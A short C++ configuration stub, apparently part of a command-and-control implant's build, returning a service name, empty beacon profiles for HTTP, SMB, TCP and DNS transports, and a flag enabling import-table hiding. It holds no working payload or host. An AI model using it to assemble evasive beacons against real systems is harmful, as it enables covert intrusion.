2026-04-06 00:20:51 -05:00

62 lines
623 B
C++

#include "config.h"
#if defined(BUILD_SVC)
char* getServiceName()
{
return (char*) "ServiceName";
}
#endif
#if defined(BEACON_HTTP)
char* getProfile()
{
return (char*)"";
}
unsigned int getProfileSize()
{
return 1;
}
#elif defined(BEACON_SMB)
char* getProfile()
{
return (char*)"";
}
unsigned int getProfileSize()
{
return 1;
}
#elif defined(BEACON_TCP)
char* getProfile()
{
return (char*)"";
}
unsigned int getProfileSize()
{
return 1;
}
#elif defined(BEACON_DNS)
char* getProfile()
{
return (char*)"";
}
unsigned int getProfileSize()
{
return 1;
}
#endif
int isIatHidingEnabled()
{
return 1;
}